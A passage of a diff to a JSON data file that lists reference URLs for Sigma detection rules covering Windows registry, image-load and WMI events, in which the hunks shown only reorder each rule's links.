"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_databases.yml" ], "tags": [ @@ -17013,8 +17013,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml" ], "tags": [ @@ -17049,9 +17049,9 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://persistence-info.github.io/Data/userinitmprlogonscript.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", - "https://persistence-info.github.io/Data/userinitmprlogonscript.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" ], "tags": [ @@ -17166,13 +17166,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" ], "tags": [ @@ -17308,8 +17308,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" ], "tags": [ @@ -17491,9 +17491,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", - "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", + "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" ], "tags": [ @@ -17758,10 +17758,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" ], "tags": [ @@ -17819,8 +17819,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", "https://github.com/hfiref0x/UACME", + "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" ], "tags": [ @@ -17855,8 +17855,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", "https://persistence-info.github.io/Data/hhctrl.html", + "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" ], "tags": [ @@ -18075,8 +18075,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" ], "tags": [ @@ -18166,8 +18166,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" ], "tags": [ @@ -18313,8 +18313,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", "https://persistence-info.github.io/Data/aedebug.html", + "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" ], "tags": [ @@ -18388,9 +18388,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/deepinstinct/Lsass-Shtinkering", - "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" ], "tags": [ @@ -18423,8 +18423,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" ], @@ -18483,9 +18483,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", - "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" ], "tags": [ @@ -18519,8 +18519,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ie.yml" ], "tags": [ @@ -18575,9 +18575,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/jamieantisocial/status/1304520651248668673", - "https://www.sans.org/cyber-security-summit/archives", "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", + "https://www.sans.org/cyber-security-summit/archives", + "https://twitter.com/jamieantisocial/status/1304520651248668673", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" ], "tags": [ @@ -18834,8 +18834,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" ], "tags": [ @@ -18963,8 +18963,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" ], "tags": [ @@ -18988,8 +18988,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/998627081360695297", "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", + "https://twitter.com/pabraeken/status/998627081360695297", "https://twitter.com/VakninHai/status/1517027824984547329", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" ], @@ -19098,8 +19098,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" @@ -19158,9 +19158,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", "https://unit42.paloaltonetworks.com/ransomware-families/", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" ], "tags": [ @@ -19191,8 +19191,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" ], "tags": [ @@ -19233,8 +19233,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" ], "tags": [ @@ -19269,8 +19269,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" ], "tags": [ @@ -19318,9 +19318,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", - "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", + "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", + "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" ], "tags": [ @@ -19343,10 +19343,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", - "https://github.com/elastic/detection-rules/issues/1371", "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", + "https://github.com/elastic/detection-rules/issues/1371", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" ], "tags": [ @@ -19437,8 +19437,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" ], @@ -19462,17 +19462,17 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://bunnyinside.com/?term=f71e8cb9c76a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml" ], "tags": [ @@ -19651,10 +19651,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1468548924600459267", - "https://github.com/gtworek/PSBits/tree/master/IFilter", "https://persistence-info.github.io/Data/ifilters.html", + "https://github.com/gtworek/PSBits/tree/master/IFilter", "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", + "https://twitter.com/0gtweet/status/1468548924600459267", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml" ], "tags": [ @@ -19812,9 +19812,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", "https://twitter.com/dez_/status/986614411711442944", - "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" ], "tags": [ @@ -19914,8 +19914,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", "https://github.com/binderlabs/DirCreate2System", + "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml" ], "tags": [ @@ -19942,9 +19942,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/bohops/WSMan-WinRM", - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://github.com/bohops/WSMan-WinRM", "https://twitter.com/chadtilbury/status/1275851297770610688", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" ], @@ -20020,8 +20020,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", "https://twitter.com/am0nsec/status/1412232114980982787", + "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" ], "tags": [ @@ -20158,8 +20158,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/wdormann/status/1547583317410607110", "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", + "https://twitter.com/wdormann/status/1547583317410607110", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" ], "tags": [ @@ -20226,8 +20226,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml" ], "tags": [ @@ -20348,11 +20348,11 @@ "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", + "https://github.com/Wh04m1001/SysmonEoP", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://github.com/Wh04m1001/SysmonEoP", "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", - "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" ], "tags": [ @@ -20467,8 +20467,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/", "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp", + "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml" ], "tags": [ @@ -20553,10 +20553,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://hijacklibs.net/", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" ], "tags": [ @@ -20801,8 +20801,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/tyranid/DotNetToJScript", - "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://thewover.github.io/Introducing-Donut/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" ], @@ -20887,8 +20887,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/", "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", + "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml" ], "tags": [ @@ -21268,8 +21268,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", "https://twitter.com/HunterPlaybook/status/1301207718355759107", + "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" ], @@ -21490,9 +21490,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" ], "tags": [ @@ -21517,9 +21517,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", - "https://twitter.com/oulusoyum/status/1191329746069655553", "https://twitter.com/mattifestation/status/1196390321783025666", + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" ], "tags": [ @@ -21659,9 +21659,9 @@ "logsource.category": "wmi_event", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", - "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", "https://github.com/RiccardoAncarani/LiquidSnake", + 